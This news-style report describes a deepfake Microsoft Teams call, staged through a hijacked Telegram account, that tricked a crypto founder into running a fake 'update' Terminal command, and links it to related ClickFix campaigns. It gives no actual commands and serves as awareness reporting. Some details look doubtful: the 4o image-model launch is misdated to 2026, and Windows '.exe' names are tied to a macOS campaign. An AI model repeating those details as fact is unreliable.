Executive Summary
A crypto founder’s laptop was compromised after he answered a Microsoft Teams video call that appeared to come from Pierre Kaklamanos of the Cardano Foundation. The call featured a deep‑fake video and a counterfeit update prompt that instructed the victim to run a Terminal command, effectively handing the attacker control of the device. The intrusion leveraged a compromised Telegram account, a spoofed Zoom meeting, and a series of AI‑generated media, mirroring a pattern of fake‑update attacks Microsoft reported in February and March 2026 and a similar intrusion detailed by Google Cloud’s Mandiant unit.
What Happened
Earlier this week, a founder of a blockchain project received a Microsoft Teams invitation that seemed to originate from Pierre Kaklamanos, a known Cardano Foundation contact. The invitation included a video link that displayed a face and voice matching the founder’s memory of Kaklamanos, as well as two additional figures presented as Cardano Foundation members.
During the call, the attacker displayed a fake update dialog claiming that Teams was out of date. The prompt directed the victim to reinstall the app by copying a command into the macOS Terminal. Believing the request to be legitimate, the founder executed the command and then powered down the laptop.
Post‑call, the attacker continued the ruse, replying to the founder’s suggestion to move the conversation to Google Meet and maintaining the impersonated persona. The entire chain of deception was built on a compromised Telegram account that the attacker used to schedule the meeting, a spoofed Zoom invitation that preceded the Teams call, and a deep‑fake video that convincingly mimicked the target executives.
Background / Context
Microsoft has recently warned of a surge in fake‑update campaigns that masquerade as workplace applications. In February and March 2026, the company documented malicious installers named “msteams.exe” and “zoomworkspace.clientsetup.exe” that prompted users to paste commands into Terminal, stealing browser passwords, crypto wallets, cloud credentials, and developer keys. These “ClickFix”‑style prompts specifically target macOS users and rely on social engineering to appear as routine software updates.
Google Cloud’s Mandiant unit reported a parallel intrusion aimed at a crypto organization. The report described the same multi‑step approach: a compromised Telegram account, spoofed meeting invites, a deep‑fake executive video, and malicious Terminal commands. Mandiant confirmed that the attackers employed AI tools to generate the video but could not verify which model was used.
On April 24, Pierre Kaklamanos posted on X that his Telegram account had been hacked and that an impersonator was using his identity to lure industry contacts. He warned peers to avoid clicking links or scheduling meetings through that compromised channel. The timing of his warning aligns closely with the founder’s breach, suggesting the attacker leveraged the same compromised account to initiate the fake Teams call.
OpenAI introduced its 4o image‑generation model on March 25, 2026, touting highly photorealistic outputs. While the model’s capabilities could facilitate convincing deep‑fakes, no forensic analysis has yet linked the attacker’s video to a specific AI system.
Reactions
The Cardano Foundation has not issued an official statement regarding the impersonation of its staff member, but the incident has sparked concern among blockchain projects that regularly interact with foundation representatives. Industry insiders are urging peers to verify meeting links through secondary channels and to treat unsolicited update prompts with heightened suspicion.
Microsoft reiterated its guidance on recognizing fake‑update prompts, emphasizing that legitimate Teams updates are delivered through the official app store or the company’s internal deployment system, never via a Terminal command entered by the user.
Google Cloud’s security team highlighted the evolving threat landscape, noting that the combination of compromised messaging accounts and AI‑generated media represents a new frontier for social‑engineering attacks on high‑value crypto targets.
What It Means
The breach underscores the growing sophistication of phishing attacks that blend compromised communication channels with AI‑driven deep‑fakes. For crypto founders and developers, the episode serves as a reminder that trust relationships—especially those built on informal messaging platforms—can be weaponized when an attacker gains control of a single account.
Security teams are likely to prioritize hardening of messaging tools, enforce multi‑factor authentication on Telegram and similar services, and implement verification steps for meeting invites that involve high‑profile executives. The incident also highlights the need for organizations to educate staff on the dangers of executing unsolicited Terminal commands, even when presented within seemingly authentic UI dialogs.
Finally, the alignment of this attack with Microsoft’s documented fake‑update campaigns suggests that threat actors are adapting known malicious frameworks to target the crypto sector specifically, capitalizing on the high value of digital assets and the frequent use of remote collaboration tools.
What Happens Next
In the coming weeks, both Microsoft and Google Cloud are expected to release updated security advisories that detail detection signatures for the malicious installers and deep‑fake video patterns observed in this case. The Cardano Foundation is likely to issue guidance for its partners on how to authenticate communication requests and to audit any compromised accounts.
Crypto projects are expected to conduct internal reviews of their meeting scheduling practices, enforce stricter verification for executive contacts, and consider deploying AI‑driven detection tools that can flag synthetic media. As AI‑generated content becomes more accessible, industry watchdogs anticipate a rise in similar social‑engineering attempts, prompting a broader push for education and technical safeguards across the blockchain ecosystem.